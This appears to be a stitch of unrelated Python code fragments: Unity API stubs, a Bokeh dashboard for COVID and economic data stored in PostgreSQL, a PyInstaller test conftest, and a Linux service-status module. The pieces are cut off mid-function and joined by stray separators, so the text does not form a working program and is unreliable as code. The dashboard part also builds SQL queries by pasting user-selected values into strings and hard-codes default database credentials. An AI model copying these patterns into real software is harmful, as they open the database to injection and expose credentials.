:rtype: UnityEngine.Matrix4x4
'''
pass
@staticmethod
def GetMatrix(arg1=None):
pass
@staticmethod
@overload
def GetTexture(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Texture
:rtype: UnityEngine.Texture
'''
pass
@staticmethod
@overload
def GetTexture(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Texture
:rtype: UnityEngine.Texture
'''
pass
@staticmethod
def GetTexture(arg1=None):
pass
@staticmethod
@overload
def GetFloatArray(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: SingleArray
:rtype: System.SingleArray
'''
pass
@staticmethod
@overload
def GetFloatArray(arg1):
'''
:param arg1: Int32
:type arg1: | |
self.p_hmap,
self.p_oxcluster,
self.p_gumbel,
self.p_votes,
row([Div(text='<div class="horizontalgap" style="width:200px"><h2>Statistics</h2></div>'),
self.p_histogram_wave,self.p_histogram_calm,self.p_duration_heatmap]),
]),
column([self.user_id,
self.voting_table,
self.gumbel_choices,
self.help_text]),
]))
def check_and_create_reference_data(self):
if not self.engine.dialect.has_table(self.engine,"johns_hopkins_country_mapping"):
conn = self.engine.connect()
self.dfMapping = pd.read_csv("https://github.com/rolls-royce/EMER2GENT/raw/master/data/sun/geo/country_name_mapping.csv",low_memory=False)
self.dfMapping.to_sql("johns_hopkins_country_mapping", conn, if_exists='replace',dtype={'ADM0_A3':sqlalchemy.types.String(3),
'name':sqlalchemy.types.String(150),
'ISO_3_code_i':sqlalchemy.types.Integer},index=False)
#print(dfMapping)
conn.close()
"""if not self.engine.dialect.has_table(self.engine,"un_population_data_2020_estimates"):
conn = self.engine.connect()
dfPopulationRaw = pd.read_excel("https://population.un.org/wpp/Download/Files/1_Indicators%20(Standard)/EXCEL_FILES/1_Population/WPP2019_POP_F01_1_TOTAL_POPULATION_BOTH_SEXES.xlsx",
sheet_name="ESTIMATES",skiprows=16,usecols="E,BZ")
alldata = []
for i,row in dfPopulationRaw.iterrows():
try:
result = pycountry.countries.get(numeric="{:03d}".format(row["Country code"]))
except:
print(row["Country code"],end="..")
continue
if result:
alldata.append({"ADM0_A3":result.alpha_3,"population":row["2020"]*1000,"name":result.name})
else:
try:
result = pycountry.countries.search_fuzzy(row["Region, subregion, country or area *"])
print(row["Country code"],result,end="..")
alldata.append({"ADM0_A3":result.alpha_3,"population":round(row["2020"]*1000),"name":result.name})
except:
continue
self.dfPopulation = pd.DataFrame(alldata)
self.dfPopulation.to_sql("un_population_data_2020_estimates", conn, if_exists='replace',dtype={'ADM0_A3':sqlalchemy.types.String(3),
'name':sqlalchemy.types.String(150),
'ISO_3_code_i':sqlalchemy.types.Integer},index=False)
#print(dfPopulation)
conn.close()"""
def download_data(self):
"""This downloads directly, from github, the Johns Hopkins and Oxford university data sets. Not error handling is performed
as it is unclear as to how to proceed in these cases (and no existing data would be overwritten)
Note this code still contains progress bar code which will not cause visual feedback, as this code
is called during a callback handling routine which prevents GUI updates. I left it in as this could change
in a future version breaking the agile rule of no provision for future growth and the sensible rule
of not having untested code.
"""
print("check_and_create_reference_data")
self.check_and_create_reference_data()
conn = self.engine.connect()
print("Finished download")
def process_data(self):
"""The heavy lifting of processing the infection numbers of Johns Hopkins and the OxCGRT data.
"""
# This look slike a duplicate
# TODO: cleanup
pass
def compute_data_status(self):
"""Determine if data are stale, or don't even exist. Staleness is determined by a "last download" item.
"""
#if not self.engine.dialect.has_table(self.engine,"johns_hopkins_data"):
# self.data_status = "no_data"
# message_text = "Could not find data file, press Load Data"
# color = "#FFi0000"
#else:
try:
conn = self.engine.connect()
result = conn.execute("SELECT MAX(datetime_date) FROM cookiecutter_case_data")
latest_datapoint = result.fetchone()[0]
data_age = datetime.datetime.now()-pd.to_datetime(latest_datapoint)
if data_age.days > 2:
self.data_status = "stale"
message_text = "Your data are {:.1f} days old, consider reloading it".format(data_age.days+data_age.seconds/86400)
color = "darkorange"
else:
self.data_status = "current"
message_text = "You have current data, which are {:.1f} days old".format(data_age.days+data_age.seconds/86400)
color = "limegreen"
except:
self.data_status = "no_data"
message_text = "Could not find data file, press Load Data"
color = "tomato"
"""datafile = "data/datafile.pckld.gz"
if os.path.exists(datafile):
with gzip.open(datafile,"rb") as f:
self.blob = json.loads(f.read())
data_age = datetime.datetime.now()-pd.to_datetime(self.blob["last_update"])
if data_age.days > 1:
self.data_status = "stale"
message_text = "Your data are {:.1f} days old, consider reloading it".format(data_age.days+data_age.seconds/86400)
color = "#FFBF00"
else:
self.data_status = "current"
message_text = "You have current data, which are {:.1f} days old".format(data_age.days+data_age.seconds/86400)
color = "#00FF00"
else:
self.data_status = "no_data"
message_text = "Could not find data file, press Load Data"
color = "#FFi0000"
"""
self.progress_bar_info_message.text = message_text
self.progress_bar_data.data["color"] = [color]
def sort_countries_by_relevance(self):
"""Work in progress on how to display the countries in a relevant oder in the dropdown. Alphabetically may cause only the countries A-G to
ever be voted on.... Here we use the relative percentage growth of infections compared to a week ago.
"""
### TODO this code would not work anymore
#score = {}
#for country in self.country_select.options:
# score[country] = self.adfCountryData[country].infection_rate_7.values[-1]
#score_sorted = {k: v for k, v in sorted(score.items(), key=lambda item: item[1],reverse=True)}
#self.country_select.options = list(score_sorted.keys())
print("SORTED")
def load_data(self):
"""Loading the data but also, as a temprary fix, checking which user files can be found in cookiecutter/data/*.csv
TODO: The latter needs to be ported to SQL
"""
print(self.data_status)
if self.data_status == "no_data":
self.dfVotesContent = pd.DataFrame()
return
else:
conn = self.engine.connect()
df = pd.read_sql("select distinct data_source from cookiecutter_case_data;",conn)
self.dataset_select.options = sorted(df.data_source.values)
self.dataset_select.value = "Johns Hopkins global"
print("DATASETS {}".format(self.dataset_select.options ))
df = pd.read_sql("SELECT DISTINCT name FROM cookiecutter_case_data WHERE data_source='Johns Hopkins global' ORDER BY name;",conn)
self.country_select.options = list(df.name.values)
sql_query = "SELECT name,identifier,count(CASE WHEN kind='begin' THEN kind END) as waves, count(CASE WHEN kind='end' THEN kind END) as episodes, count(*) from cookiecutter_computed_waves_chgpoint GROUP BY name,cookiecutter_computed_waves_chgpoint.identifier"
dfWaves = pd.read_sql(sql_query,conn)
try:
sql_query = "SELECT count(r.identifier) as votes,r.identifier FROM (SELECT identifier FROM cookiecutter_verdicts GROUP BY vote_id,identifier) as r GROUP BY r.identifier;"
dfVotes = pd.read_sql(sql_query,conn)
except:
dfVotes=pd.DataFrame({"identifier":[],"votes":[],"count":[]})
dfVotesContent = dfWaves.merge(dfVotes,on="identifier",how="outer").fillna(0)
dfVotesContent.votes = dfVotesContent.votes.astype(int)
dfVotesContent["need_vote"] = dfVotesContent.waves+dfVotesContent.episodes > dfVotesContent.votes
dfVotesContent["count"] = dfVotesContent.waves+dfVotesContent.episodes
dfVotesContent = dfVotesContent.sort_values("count",ascending=False)
if len(dfVotesContent)>0:
self.cds_votes.data = {"name":dfVotesContent.name.values,
"waves":dfVotesContent.waves.values,
"episodes":dfVotesContent.episodes.values,
"votes":dfVotesContent.votes.values,
"need_vote":dfVotesContent.need_vote.values}
else:
self.cds_votes.data = {"name":[],
"waves":[],
"episodes":[],
"votes":[],
"need_vote":[]}
self.compute_metrics()
#self.country_select.value = "Germany"
self.cds.selected.on_change('indices',self.on_selection_change_callback)
pass
class GUIEconomy():
def __init__(self):
self.theme = THEME()
self.data_status = "no_data" # "stale", "current"
if "SQL_CONNECT" not in list(os.environ.keys()):
sql_url = "postgresql://cookiecutter:cookiecutter@database:5432/cookiec"
else:
sql_url = os.environ["SQL_CONNECT"]
#print("SQL_CONNECT {}".format(sql_url))
self.engine = create_engine(sql_url, pool_size=10, max_overflow=20)
print(self.engine)
self.add_point_guard = False
pass
def change_category(self,attr,old,new):
#print(old,new)
self.get_keys(category=new)
if self.key_select.disabled:
self.key_select.value = ""
else:
self.key_select.value = self.key_select.options[0]
#print(self.key_select.options)
def get_categories(self):
conn = self.engine.connect()
categories = []
try:
result = conn.execute("SELECT DISTINCT category FROM economic_indicators;")
categories.extend([c[0] for c in result.fetchall()])
conn.close()
except:
pass
#print(categories)
self.category_select.options=categories
self.cds_proxy_data.data = {"datetime":[],"value":[]}
def change_key(self,attr,old,new):
if len(new) <= 0:
print("Zero length key")
return
else:
print("CHANGE KEY TO ",new)
category = self.category_select.value
key = new
conn = self.engine.connect()
sql_query = "SELECT datetime_date,parameter_value FROM economic_indicators WHERE category='{}' and parameter_name='{}' ORDER BY datetime_date;".format(category,key)
df = pd.read_sql(sql_query,conn)
print("CHANGE_KEY from '{}' to '{}'".format(old,new))
print(sql_query)
#print(df)
self.cds_proxy_data.data = {"datetime":df["datetime_date"].values,"value":df["parameter_value"].values}
self.p_values.title.text = "{} - {}".format(category,key)
self.p_values.x_range=DataRange1d(pd.to_datetime(self.start_date.value).date(),pd.to_datetime(self.end_date.value).date())
#self.value_axis.bounds=DataRange1d(df.value.min(),df.value.max())
value_range = df["parameter_value"].max()-df["parameter_value"].min()
self.p_values.extra_y_ranges["value"].start = df["parameter_value"].min()-value_range*0.05
self.p_values.extra_y_ranges["value"].end = df["parameter_value"].max()+value_range*0.05
self.p_values.yaxis[1].axis_label = new
df = pd.read_sql("SELECT DISTINCT explanation,explanation_text FROM economic_indicators WHERE category='{}' and parameter_name='{}';".format(category,key),conn)
conn.close()
url_shown = df["explanation"].values[0]
url = "https://translate.google.com/translate?hl=en&sl=auto&tl=en&u={}".format(urllib.parse.quote_plus(url_shown))
self.explanation.text="<H1>{}</H1><H2>{}</H2>See <A HREF=\"{}\" style=\"color:#DDDDDD;\">{}</A> for more details".format(category,key,url,url_shown)
self.explanation_text.text = df["explanation_text"].values[0]
def get_keys(self,category=""):
if category == "":
category = self.category_select.value
conn = self.engine.connect()
result = conn.execute("SELECT DISTINCT parameter_name FROM economic_indicators WHERE category='{}' ORDER BY parameter_name;".format(category))
keys = []
keys.extend([k[0] for k in result.fetchall()])
#print("KEYS {}".format(keys))
conn.close()
if len(keys) <= 0:
self.key_select.options=["<select catgory first>"]
#self.key_select.value=["<select catgory first>"]
self.key_select.disabled = True
else:
self.key_select.options = keys
self.key_select.disabled = False
def load_data(self):
if "TSAPAX" in self.category_select.options:
self.category_select.value = "TSAPAX"
#print('self.change_category(None,"","TSAPAX")')
else:
self.category_select.value = ""
#print('self.change_category(None,"","")')
## self.category_select.value = "TSAPAX"
#self.change_category(None,"","TSAPAX")
if "PERCENTAGE" in self.key_select.options:
self.key_select.value = "PERCENTAGE"
#print('self.key_select.value = "PERCENTAGE"')
else:
self.key_select.value = ""
#print('self.key_select.value = ""')
## self.key_select.value = "PERCENTAGE"
conn = self.engine.connect()
try:
ddf = pd.read_sql("SELECT DISTINCT name FROM input_output_tables",conn)
regions = sorted(ddf.name.values)
except:
regions = ["Global","Europe","National"]
self.scenario_region.options = regions
self.scenario_region.value = regions
try:
ddf = pd.read_sql("SELECT DISTINCT row_sector FROM input_output_tables",conn)
sectors = sorted(ddf.row_sector.values)
except:
sectors = sorted(["Air Transport","Hotel","Finance","Industry","Sales","Services"])
self.scenario_sector.options = sectors
self.scenario_sector.value = [random.choice(sectors)]
conn.close()
def add_point(self,attr,old,new):
if self.add_point_guard:
return
self.add_point_guard = True
ddf = pd.DataFrame(new)
#if pd.Index(ddf["datetime"]).is_monotonic:
# return
ddf = ddf.sort_values("datetime").reset_index()
del ddf["index"]
ddf["coloridx"] = -1
ddf["class"] = "shock"
ddf.at[ddf[ddf["value"].diff(1)>0].index.min():,"coloridx"]=1
ddf.at[ddf[ddf["value"].diff(1)>0].index.min():,"class"]="recovery"
#print(ddf)
self.cds_drawn_polyline.data = {"datetime":ddf.datetime.values,"value":ddf.value.values,"coloridx":ddf.coloridx.values,"class":ddf["class"].values}
#print(self.cds_drawn_polyline.data)
self.add_point_guard = False
self.clear_drawing.disabled = False
def save_scenario_callback(self,event):
df = self.cds_drawn_polyline.to_df()
df["user_id"] = self.user_id.value
df["datetime_vote"] = datetime.datetime.now()
df["scenario_name"] = self.scenario_name.value
df["category"] = self.category_select.value
df["parameter_name"] = self.key_select.value
df = df.rename(columns={"value":"parameter_value","datetime":"datetime_date","class":"shock_recovery"}) # db2 does not like value in SQL statements
df["datetime_date"] = pd.to_datetime(df["datetime_date"]*1E6)
df.to_csv("doobee.csv",index=False)
conn = self.engine.connect()
df.to_sql("cookiecutter_scenarios",conn,if_exists="append",dtype={'user_id':sqlalchemy.types.String(50),
'datetime_vote': sqlalchemy.types.DateTime,
'scenario_name':sqlalchemy.types.String(100),
'category':sqlalchemy.types.String(100),
'datetime_date': sqlalchemy.types.DateTime,
'shock_recovery':sqlalchemy.types.String(20),
'parameter_name':sqlalchemy.types.String(100),
'parameter_value':sqlalchemy.types.Float },index=False)
conn.close()
pass
def clear_drawing_callback(self,event):
self.cds_drawn_polyline.data = {"datetime":[],"value":[],"coloridx":[],"class":[]}
def delete_selected_point_callback(self,event):
data = self.cds_drawn_polyline.data
newdata = {}
for k in data.keys():
newdata[k] = [i for j, i in enumerate(data[k]) if j not in self.cds_drawn_polyline.selected.indices] # https://stackoverflow.com/questions/497426/deleting-multiple-elements-from-a-list
self.cds_drawn_polyline.selected.indices = []
self.cds_drawn_polyline.data = newdata
def drawn_polyline_selection_change_callback(self,attr,old,new):
print("drawn_polyline_selection_change_callback old {} new {}".format(old,new))
if len(new)>0:
self.delete_selected_point.disabled = False
else:
self.delete_selected_point.disabled = True
pass
def scenario_name_callback(self,attr,old,new): #################
print("SCENARIO_NAME_CALLBACK",old,new)
if len(new)>0:
self.save_scenario.disabled = False
else:
self.save_scenario.disabled = True
def create(self):
self.cds_proxy_data = ColumnDataSource(pd.DataFrame({"datetime":[],"value":[]}))
self.cds_drawn_polyline = ColumnDataSource({"datetime":[],"value":[],"coloridx":[],"class":[]})
self.heading = Div(text="<H1>Economic Data</H1>")
self.category_select = Select(title="Category",options=[""])
self.get_categories()
self.category_select.value = ""
self.key_select = Select(title="Key",options=[""])
self.start_date = DatePicker(title="Start Date",value=pd.to_datetime("2020-01-01").date())
self.end_date = DatePicker(title="End Date",value=datetime.date.today())
self.p_values = figure(plot_width=1200, plot_height=400,x_axis_type='datetime',title="",
y_range=(0,1.05),
tools="pan,box_zoom,box_select,reset", #active_drag="point_draw",
#output_backend="webgl"
)
self.p_values.extra_y_ranges = {"value":Range1d()}
self.p_values = self.theme.apply_theme_defaults(self.p_values)
self.p_values.background_fill_color = "#ffffff"
self.p_values.line(x="datetime",y="value",source=self.cds_proxy_data,y_range_name="value")
#self.value_axis = LinearAxis(y_range_name="value")
self.p_values.add_layout(LinearAxis(y_range_name="value",
axis_label_text_color=self.theme.text_color,
major_label_text_color=self.theme.text_color,
axis_line_color=self.theme.plot_color), 'right')
editor = self.p_values.line(x="datetime",y="value",source=self.cds_drawn_polyline,line_color="darkgrey",line_width=3)
mapper = linear_cmap(field_name="coloridx",palette=["tomato","grey","seagreen"],low=-1,high=1)
self.p_values.circle(x="datetime",y="value",source=self.cds_drawn_polyline,size=25,fill_color=mapper)#,fill_color="color",size=25)
draw_tool = PointDrawTool(renderers=[editor], empty_value='black')
self.p_values.add_tools(draw_tool)
self.p_values.toolbar.active_tap = draw_tool
columns = [TableColumn(field="datetime", title="Datetime", formatter=DateFormatter(),width=100),
TableColumn(field="value", title="Value",formatter=NumberFormatter(format="0.00"), width=100),
TableColumn(field="class", title="Shock/Recovery", width=100)]
self.proxy_table = DataTable(source=self.cds_drawn_polyline, columns=columns, editable=True, height=500,selectable='checkbox',index_position=None)
self.user_id = TextInput(value="nobody@{}".format(socket.gethostname()),title="Name to save your results")
regions = []
self.scenario_region = MultiChoice(title="Region the scenario applies to",options=regions,value=regions)
sectors = []
self.scenario_sector = MultiChoice(title="Sector the scenario applies to",options=sectors,value=sectors,width=400)
dummy_text = "Scenario {:%Y-%m-%d %H:%M} using ".format(datetime.datetime.now())
self.scenario_name = TextInput(title="Title to save your scenario",value=dummy_text)# Only | |
<reponame>c-jo/pyinstaller<gh_stars>10-100
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Imports
# =======
# Library imports
# ---------------
import copy
import glob
import os
import pytest
import re
import subprocess
import sys
import inspect
import textwrap
import io
import shutil
from contextlib import suppress
# Third-party imports
# -------------------
import py
import psutil # Manages subprocess timeout.
# Set a handler for the root-logger to inhibit 'basicConfig()' (called in
# PyInstaller.log) is setting up a stream handler writing to stderr. This
# avoids log messages to be written (and captured) twice: once on stderr and
# once by pytests's caplog.
import logging
logging.getLogger().addHandler(logging.NullHandler())
# Local imports
# -------------
# Expand sys.path with PyInstaller source.
_ROOT_DIR = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
sys.path.append(_ROOT_DIR)
from PyInstaller import configure, config
from PyInstaller import __main__ as pyi_main
from PyInstaller.utils.tests import gen_sourcefile
from PyInstaller.utils.cliutils import archive_viewer
from PyInstaller.compat import is_darwin, is_win, safe_repr, \
architecture, is_linux, text_read_mode
from PyInstaller.depend.analysis import initialize_modgraph
from PyInstaller.utils.win32 import winutils
from PyInstaller.utils.hooks.qt import pyqt5_library_info, pyside2_library_info
# Globals
# =======
# Timeout for running the executable. If executable does not exit in this time
# then it is interpreted as test failure.
_EXE_TIMEOUT = 30 # In sec.
# Number of retries we should attempt if the executable times out.
_MAX_RETRIES = 2
# All currently supported platforms
SUPPORTED_OSES = {"darwin", "linux", "win32"}
# Code
# ====
# Fixtures
# --------
@pytest.fixture
def SPEC_DIR(request):
"""Return the directory where the test spec-files reside"""
return py.path.local(_get_spec_dir(request))
@pytest.fixture
def SCRIPT_DIR(request):
"""Return the directory where the test scripts reside"""
return py.path.local(_get_script_dir(request))
def pytest_runtest_setup(item):
"""Markers to skip tests based on the current platform.
https://pytest.org/en/stable/example/markers.html#marking-platform-specific-tests-with-pytest
Available markers: see setup.cfg [tool:pytest] markers
- @pytest.mark.darwin (macOS)
- @pytest.mark.linux (GNU/Linux)
- @pytest.mark.win32 (Windows)
"""
supported_platforms = SUPPORTED_OSES.intersection(
mark.name for mark in item.iter_markers())
plat = sys.platform
if supported_platforms and plat not in supported_platforms:
pytest.skip("only runs on %s" % plat)
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
# execute all other hooks to obtain the report object
outcome = yield
rep = outcome.get_result()
# set an report attribute for each phase of a call, which can
# be "setup", "call", "teardown"
setattr(item, "rep_" + rep.when, rep)
# Return the base directory which contains the current test module.
def _get_base_dir(request):
return os.path.dirname(os.path.abspath(request.fspath.strpath))
# Directory with Python scripts for functional tests. E.g. main scripts, etc.
def _get_script_dir(request):
return os.path.join(_get_base_dir(request), 'scripts')
# Directory with testing modules used in some tests.
def _get_modules_dir(request):
return os.path.join(_get_base_dir(request), 'modules')
# Directory with .toc log files.
def _get_logs_dir(request):
return os.path.join(_get_base_dir(request), 'logs')
# Return the directory where data for tests is located.
def _get_data_dir(request):
return os.path.join(_get_base_dir(request), 'data')
# Directory with .spec files used in some tests.
def _get_spec_dir(request):
return os.path.join(_get_base_dir(request), 'specs')
@pytest.fixture
def script_dir(request):
return py.path.local(_get_script_dir(request))
# A helper function to copy from data/dir to tmpdir/data.
def _data_dir_copy(
# The pytest request object.
request,
# The name of the subdirectory located in data/name to copy.
subdir_name,
# The tmpdir object for this test. See
# https://pytest.org/latest/tmpdir.html.
tmpdir
):
# Form the source and tmp paths.
source_data_dir = py.path.local(_get_data_dir(request)).join(subdir_name)
tmp_data_dir = tmpdir.join('data', subdir_name)
# Copy the data.
shutil.copytree(source_data_dir.strpath, tmp_data_dir.strpath)
# Return the temporary data directory, so that the copied data can now be
# used.
return tmp_data_dir
# Define a fixure for the DataDir object.
@pytest.fixture
def data_dir(
# The request object for this test. See
# https://pytest.org/latest/builtin.html#_pytest.python.FixtureRequest
# and
# https://pytest.org/latest/fixture.html#fixtures-can-introspect-the-requesting-test-context.
request,
# The tmpdir object for this test. See
# https://pytest.org/latest/tmpdir.html.
tmpdir):
# Strip the leading 'test_' from the test's name.
name = request.function.__name__[5:]
# Copy to tmpdir and return the path.
return _data_dir_copy(request, name, tmpdir)
class AppBuilder(object):
def __init__(self, tmpdir, request, bundle_mode):
self._tmpdir = tmpdir
self._request = request
self._mode = bundle_mode
self._specdir = str(tmpdir)
self._distdir = str(tmpdir / 'dist')
self._builddir = str(tmpdir /'build')
def test_spec(self, specfile, *args, **kwargs):
"""
Test a Python script that is referenced in the supplied .spec file.
"""
__tracebackhide__ = True
specfile = os.path.join(_get_spec_dir(self._request), specfile)
# 'test_script' should handle .spec properly as script.
return self.test_script(specfile, *args, **kwargs)
def test_source(self, source, *args, **kwargs):
"""
Test a Python script given as source code.
The source will be written into a file named like the
test-function. This file will then be passed to `test_script`.
If you need other related file, e.g. as `.toc`-file for
testing the content, put it at at the normal place. Just mind
to take the basnename from the test-function's name.
:param script: Source code to create executable from. This
will be saved into a temporary file which is
then passed on to `test_script`.
:param test_id: Test-id for parametrized tests. If given, it
will be appended to the script filename,
separated by two underscores.
All other arguments are passed straight on to `test_script`.
Ensure that the caller of `test_source` is in a UTF-8
encoded file with the correct '# -*- coding: utf-8 -*-' marker.
"""
__tracebackhide__ = True
# For parametrized test append the test-id.
scriptfile = gen_sourcefile(self._tmpdir, source,
kwargs.setdefault('test_id'))
del kwargs['test_id']
return self.test_script(str(scriptfile), *args, **kwargs)
def test_script(self, script, pyi_args=None, app_name=None,
app_args=None, runtime=None, run_from_path=False,
**kwargs):
"""
Main method to wrap all phases of testing a Python script.
:param script: Name of script to create executable from.
:param pyi_args: Additional arguments to pass to PyInstaller when creating executable.
:param app_name: Name of the executable. This is equivalent to argument --name=APPNAME.
:param app_args: Additional arguments to pass to
:param runtime: Time in seconds how long to keep executable running.
:param toc_log: List of modules that are expected to be bundled with the executable.
"""
__tracebackhide__ = True
def marker(line):
# Print some marker to stdout and stderr to make it easier
# to distinguish the phases in the CI test output.
print('-------', line, '-------')
print('-------', line, '-------', file=sys.stderr)
if pyi_args is None:
pyi_args = []
if app_args is None:
app_args = []
if app_name:
pyi_args.extend(['--name', app_name])
else:
# Derive name from script name.
app_name = os.path.splitext(os.path.basename(script))[0]
# Relative path means that a script from _script_dir is referenced.
if not os.path.isabs(script):
script = os.path.join(_get_script_dir(self._request), script)
self.script = script
assert os.path.exists(self.script), 'Script %s not found.' % script
marker('Starting build.')
if not self._test_building(args=pyi_args):
pytest.fail('Building of %s failed.' % script)
marker('Build finshed, now running executable.')
self._test_executables(app_name, args=app_args,
runtime=runtime, run_from_path=run_from_path,
**kwargs)
marker('Running executable finished.')
def _test_executables(self, name, args, runtime, run_from_path, **kwargs):
"""
Run created executable to make sure it works.
Multipackage-tests generate more than one exe-file and all of
them have to be run.
:param args: CLI options to pass to the created executable.
:param runtime: Time in seconds how long to keep the executable running.
:return: Exit code of the executable.
"""
__tracebackhide__ = True
exes = self._find_executables(name)
# Empty list means that PyInstaller probably failed to create any executable.
assert exes != [], 'No executable file was found.'
for exe in exes:
# Try to find .toc log file. .toc log file has the same basename as exe file.
toc_log = os.path.join(
_get_logs_dir(self._request),
os.path.splitext(os.path.basename(exe))[0] + '.toc')
if os.path.exists(toc_log):
if not self._examine_executable(exe, toc_log):
pytest.fail('Matching .toc of %s failed.' % exe)
retcode = self._run_executable(exe, args, run_from_path, runtime)
if retcode != kwargs.get('retcode', 0):
pytest.fail('Running exe %s failed with return-code %s.' %
(exe, retcode))
def _find_executables(self, name):
"""
Search for all executables generated by the testcase.
If the test-case is called e.g. 'test_multipackage1', this is
searching for each of 'test_multipackage1.exe' and
'multipackage1_?.exe' in both one-file- and one-dir-mode.
:param name: Name of the executable to look for.
:return: List of executables
"""
exes = []
onedir_pt = os.path.join(self._distdir, name, name)
onefile_pt = os.path.join(self._distdir, name)
patterns = [onedir_pt, onefile_pt,
# Multipackage one-dir
onedir_pt + '_?',
# Multipackage one-file
onefile_pt + '_?']
# For Windows append .exe extension to patterns.
if is_win:
patterns = [pt + '.exe' for pt in patterns]
# For Mac OS X append pattern for .app bundles.
if is_darwin:
# e.g: ./dist/name.app/Contents/MacOS/name
pt = os.path.join(self._distdir, name + '.app', 'Contents', 'MacOS', name)
patterns.append(pt)
# Apply file patterns.
for pattern in patterns:
for prog in glob.glob(pattern):
if os.path.isfile(prog):
exes.append(prog)
return exes
def _run_executable(self, prog, args, run_from_path, runtime):
"""
Run executable created by PyInstaller.
:param args: CLI options to pass to the created executable.
"""
# Run the test in a clean environment to make sure they're | |
= -1
else:
temp = GetUpstartEnabled(sc)
if temp is False:
Enabled = False
else:
# When GetUpstartEnabled returns "Complex", we assume that it
# is enabled (and we won't modify it).
Enabled = True
State = GetUpstartState(sc)
Path = "/etc/init/" + sc.Name + ".conf"
elif sc.Controller == "init":
if not ServiceExistsInInit(sc):
Print("Error: Unable to find service named " +
sc.Name + " in init.", file=sys.stderr)
LG().Log(
'ERROR', "Error: Unable to find service named " +
sc.Name + " in init.")
exit_code = -1
else:
Enabled = GetInitEnabled(sc)
State = GetInitState(sc)
Path = "/etc/init.d/" + sc.Name
GetOne(sc)
return [exit_code, Name, Controller, Enabled, State, Path, sc.Description, sc.Runlevels]
def GetOne(sc):
GetAll(sc)
if len(sc.services_list):
sc.Description = sc.services_list[0]['Description']
sc.Runlevels = sc.services_list[0]['Runlevels']
def GetAll(sc):
if sc.Controller == 'init':
return InitdGetAll(sc)
if sc.Controller == 'systemd':
return SystemdGetAll(sc)
if sc.Controller == 'upstart':
return UpstartGetAll(sc)
def GetRunlevels(sc, Name):
if sc.runlevels_d == None:
sc.runlevels_d = {}
cmd = "file /etc/rc*.d/* | grep link | awk '{print $5,$1}' | sort"
code, out = RunGetOutput(cmd, False, False)
for line in out.splitlines():
line = line.replace("'", '')
srv = line.split(' ')[0]
rl = line.split(' ')[1]
n = os.path.basename(srv)
if n not in sc.runlevels_d.keys():
sc.runlevels_d[n] = {}
if 'Path' not in sc.runlevels_d[n].keys():
sc.runlevels_d[n]['Path'] = srv.replace('..', '/etc')
if 'Runlevels' not in sc.runlevels_d[n].keys():
sc.runlevels_d[n]['Runlevels'] = ''
s = 'off'
if rl[11].lower() == 's':
s = 'on'
sc.runlevels_d[n]['Runlevels'] += rl[7] + ':' + s + ' '
if Name in sc.runlevels_d.keys():
return sc.runlevels_d[Name]
return None
def SystemdGetAll(sc):
d = {}
if os.system('which systemctl') != 0:
Print("Error: 'Controller' = " + sc.Controller +
" is incorrectly specified.", file=sys.stderr)
LG().Log('ERROR', "Error: 'Controller' = " +
sc.Controller + " is incorrectly specified.")
return False
Name = sc.Name
if '*' not in Name and '?' not in Name and len(Name) > 0:
Name = Name.replace('.service', '')
Name += '.service'
# Do the commands work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the commands.
# RunGetOutput(chk_err = True) will log the error message here if it
# occurs.
cmd = 'systemctl -a list-unit-files ' + Name
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0: # Serious problem, return False
return False
sname = ''
# Get the last service name from the output.
m = re.search(r'.*?\n(.*?)[.]service.*?\n', txt, re.M)
if m is None: # The result is empty, return True.
return True
sname = m.group(1)
cmd = 'systemctl -a --no-pager --no-legend -p "Names,WantedBy,Description,SubState,FragmentPath,UnitFileState" show ' + sname
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = 'systemctl -a list-unit-files ' + Name + '| grep \.service | grep -v "@" | awk \'{print $1}\' | xargs systemctl -a --no-pager --no-legend -p "Names,WantedBy,Description,SubState,FragmentPath,UnitFileState" show'
code, txt = RunGetOutputNoStderr(cmd, False, False)
txt=txt.replace('\n\n','@@')
txt=txt.replace('\n','|')
services=txt.split('@@')
subs=re.compile(r'(.*?=)')
for srv in services:
if len(srv) == 0:
continue
s=srv.split('|')
d['Name'] = subs.sub('',s[0].replace('.service',''))
d['Controller'] = sc.Controller
d['Description'] =subs.sub('',s[2])
d['State'] = subs.sub('',s[3])
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = subs.sub('',s[4])
d['Enabled'] = 'enabled' in subs.sub('',s[5])
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
rld=GetRunlevels(sc,d['Name'])
if rld != None and 'Runlevels' in rld.keys():
d['Runlevels'] = rld['Runlevels']
else:
d['Runlevels'] = subs.sub('',s[1])
sc.services_list.append(copy.deepcopy(d))
return True
def UpstartGetAll(sc):
d={}
names={}
if os.system('which initctl') != 0:
Print("Error: 'Controller' = " + sc.Controller + " is incorrectly specified.", file=sys.stderr)
LG().Log('ERROR', "Error: 'Controller' = " + sc.Controller + " is incorrectly specified.")
return False
# Do the commands work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the commands.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = 'initctl list'
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
cmd = initd_service + ' --status-all'
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = "initctl list | sed 's/[(].*[)] //g' | tr ', ' ' ' | awk '{print $1,$2}'"
code, txt = RunGetOutputNoStderr(cmd, False, False)
services = txt.splitlines()
cmd = initd_service + " --status-all &> /tmp/tmpfile ; cat /tmp/tmpfile ; rm /tmp/tmpfile"
code, txt = RunGetOutputNoStderr(cmd, False, False)
txt = txt.replace('[','')
txt = txt.replace(']','')
services.extend(txt.splitlines())
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
